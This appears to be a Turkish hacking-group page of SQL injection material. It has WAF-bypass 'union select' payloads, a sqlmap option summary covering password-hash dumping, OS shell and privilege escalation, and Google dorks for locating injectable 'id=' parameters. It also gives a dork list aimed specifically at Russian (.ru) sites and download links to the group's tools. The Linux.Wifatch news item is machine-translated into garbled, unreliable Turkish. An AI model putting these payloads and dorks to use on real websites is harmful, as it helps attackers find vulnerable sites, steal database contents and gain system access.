SQL injection Bypass WAF part 1

1 : union select 1,2,3,4,5

2 : /**/union/**/select/**/1,2,3,4,5

3 . %0Aunion%0Aselect%0A1,2,3,4,5

4 .union(select(1),(2),(3),(4),(5))

SQLMAP Komutları //

sqlmap --help ile seçenekler görüntülenebilir.

- Target (Hedef) :

Bu seçeneklerden biri, kaynağın hedefe ulaşabilmesi için set edilmelidir.

- u, --url (URL) : Hedefin url adresi

- l LOGFILE : Burp veya Webscraper günlüklerinden hedefi araştır.

- g googledork : Google dork prosesinden dönen urlleri kullan.

- Request (İstek)

Hedef url’e nasıl bağlanacağının belirlenmesi için bu seçenekler kullanılır.

-- data = DATA : Veri dizisi POST aracılığı ile gönderilir. (manuel)

-- cookie=cookıe : Belirtilen HTTP Cookie başlığı gönder.

-- proxy = PROXY: Hedef url e bağlanırken belirtlilen HTTP Proxy’ i kullan.

-- auth-type = ... : HTTP kimlik doğrulama tipi (Basic, Digest veya NTLM)

-- user-agent = ... : Belirlilen HTTP User - Agent i kullan

- Injection (Enjeksiyon) :

Bu seçenekler test için hangi parametrelerin seçileceğini belirtir.

- p testparameter : Test edilebilir parametreler gir.

-- dbms= DBMS : Belirtilen veri tabanı yönetim sistemi için değerleri kullan.

-- os = OS : Belirtilen DBMS işletim sistemi için bu değeri zorla.

-- invalid-bignum : Geçersiz değerler için büyük numaraları kullan.

- Detection (Tespit)

Bu seçenekler tespit fazını özelleştirmek için kullanılır.

-- level = LEVEL: Test performansının seviyesini belirler. (1-5, default 1)

-- risk = RISK : Gerçekleştirilen testin riski (0-3, default 1)

-- string STRIN : Sorgu doğru olarak değerlendirildiği zaman stringi eşleştir.

-- technique = … : Test için SQL injection tekniği (default “BEUSTQ”)

- Enumeration (Bilgi Dökümü) :

Veri tabanı yönetimi, tabloların içerdiği veri ve yapıları hakkında bilgi

dökümü toplar. Ayrıca hazınladığınız SQL ifadelerini çalıştırabilirsiniz.

- a, -all : Tüm bilgileri al.

- b, --banner : DBMS banner bilgisini al.

-- users : DBMS kullanıcı bilgileri al.

-- passwords : Kullanıcı şifre haslerini al.

-- dbs : DBMS veri tabanlarını bul ve getir.

-- dump : Tüm DBMS veri tabanı tablolarının girdilerini getir.

- Operating system access (İşletim Sistemi erişimi)

Bu seçenekler DBMS altından işletim sistemine sızıldığında kullanılır.

-- os-shell : İşletim sisteminden shell istemi

-- priv-esc : Veri tabanı prosesi için kullanıcı yetki yükseltmesi.

- General (Genel) :

Bu seçenekler bazı genel çalışma parametrelerini ayarlamak için vardır.

-- batch : Asla kullanıcı girdisi sorma, varsayılan davranışları kullan.

- b, --banner : DBMS banner bilgisini al.

-- update : sqlmap i güncelleştir.

-- forms : Hedef url üzerinde uygulanacak test formları ve ayrıştırıcılar.

-- save : INI konfigrasyon dosyası için seçenekelri kaydet.

-- tor : Tor ağını kullanma.

- Miscellaneous ( Diğer Özellikler )

-- dependencies : sqlmap gerekliliklerini kontrol et.

-- beep : SQL injwction bulunduktan sonra beep sesi çıkar.

-- wizard : Yeni başlayanlar için arayüz sihirbazı.

PS : Tüm bu özellikler sqlmapin çok kullanılan özellikleridir. Tümü için --help.

Site Üzerinde "id=" Değeri Bulmak

Hedef Site Üzerinde Sql İnjection Aramak İçin İd Değerlerine Ulaşmanız Gerekmektedir...

Bunu İçin Öncelikle Kullanacağınız Komutları Bilmeniz Gerekmektedir..

Başlıca 2 Tane Komut Vardır Bunlar

1 - Site:hedef.org "id="
2 - site:hedef.org "you have an error in your sql syntax"

Bu Şekilde Arama Yaptıgınızda Sonuçları Göreceksiniz ..

GokBoruEfe//
---------------------

Atatürk Tasarım

Atsız 3B

Herşey Türk^'lük İçin

Komando Tasarım

1923Turk-Security

TR-Devastating Website Source Code

TR-Devastating Website Source Code
--------------------
Web Application Security
Copyright  (c) 2015 TR-Devastating
---------------------------------------
The result is the programmer responsible use of the problems
that may occur Not Using Programme is problematic

TANRI  TÜRK'E YAR OLSUN TURAN ELLER VAR OLSUN


http://www.4shared.com/file/JVnY2Gl0ce/TR-Devastating_Website_Source_.html

TR-Devastating Multi Search

TR-Devastating - Multi Search
--------------------------------------
Web Application Security
Copyright  (c) 2015 TR-Devastating
---------------------------------------
The result is the programmer responsible use of the problems
that may occur Not Using Programme is problematic

Download : http://www.4shared.com/file/6SOGXqoZba/TR-Devastating_Multi_Search.html

Linux.Wifatch 10.000 yönlendiriciler onları güvenli hale getirmek için kesmek

Linux.Wifatch  ("Ifwatch) gerçekten ilginç bir malware olduğunu. Bağımsız bir araştırmacı tarafından bu yılın başlarında keşfedilmiş ve o zamandan beri bu tür yönlendirici gibi cihazların içine yerleştirilen ancak bunun yerine bir ağ saldıran veya kötü amaçlı kod yüklemek ve Symantec tarafından takip bu cihazlar daha güvenli hale getirmeyi hedefliyor.

"Koruyucu ağı" olarak Nitelikli bir hacker "beyaz şapka" ile programlanmış görünüyor. Ve zararlı aktivite için herhangi bir yük uygulamıyor Perl ile yazılmış Linux sistemi Linux.Wifatch kodu ile 10.000 'den fazla yönlendiriciler tanıttı, bu algılar ve malware bilinen aileleri kaldırır ilgili cihazlarda mevcut.

Hatta bu cihazların güvenliği konusunda kullanıcılarını yetiştirmeyi amaçlamaktadır bizim altyapı merkezi. Cihazlarda kaldıktan sonra kötü niyetli etkinliği algılar ve sahipleri teşvik Telnet bağlantı noktasını kapatmak için daha güçlü ve potansiyel olarak savunmasız onların şifrenizi değiştirin.

Günlük enjekte uzaktan kod geliştirme, (özellikle Çin ve Brezilya'da) Linux.Wifatch tarafından hacklendi 10.000 yönlendiriciler düşünülebilir ve olan kötü niyetli etkinliği kanıtlanmış olmamasına rağmen kapı entegre arkainsafına yönlendirici ve ağ izin Programcı iradesi.

Bu Linux.Wifatch kabul edilir ne gelecekte değişecek kötü amaçlı yazılım ortadan kaldırmak bu kılavuzu takip ederek  olur kötü niyetli bir virüs tersini yapıyor kadar şu ana kadar olduğu gibi. Şüphesiz bir meraklı gelişme.

Russia Sql İnjection Dorks / GokBoruEfe

php?item_id= site:ru
php?id= site:ru
php?coID= site:ru
php?num= site:ru
php?avd= site:ru
php?category= site:ru
php?file= site:ru
php?cat= site:ru
php?incluru= site:ru
php?pageid= site:ru
php?page_id= site:ru
php?param= site:ru
php?panel= site:ru
php?sec= site:ru
php?do=part&id= site:ru
php?item_id= site:ru
php?client= site:ru
php?co_id= site:ru
php?language= site:ru
php?currency= site:ru
php?checkout= site:ru
php?cid= site:ru
php?products_name= site:ru
php?product_id= site:ru
php?step= site:ru
php?topicid= site:ru
php?topic_id= site:ru
php?id_category= site:ru
php?tid= site:ru
php?fid= site:ru

TR-Devastating Dork List Pack

TR-Devastating
--------------------
Web Application Security Dork List
Copyright  (c) 2015 TR-Devastating

---------------------------------------
The result is the programmer responsible use of the problems 

that may occur Not Using Programme is problematic

http://www.4shared.com/file/Vx7eLEAqce/TR-Devastating_Dork_List_Pack.html